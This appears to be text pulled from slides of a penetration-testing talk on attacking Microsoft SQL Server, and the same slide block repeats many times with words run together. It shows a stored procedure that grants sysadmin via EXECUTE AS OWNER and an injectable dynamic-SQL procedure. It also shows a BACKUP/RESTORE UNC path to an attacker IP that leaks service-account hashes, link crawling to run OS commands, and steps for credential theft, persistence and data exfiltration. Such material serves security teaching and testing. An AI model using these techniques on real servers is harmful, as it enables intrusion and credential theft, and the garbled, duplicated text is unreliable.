under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
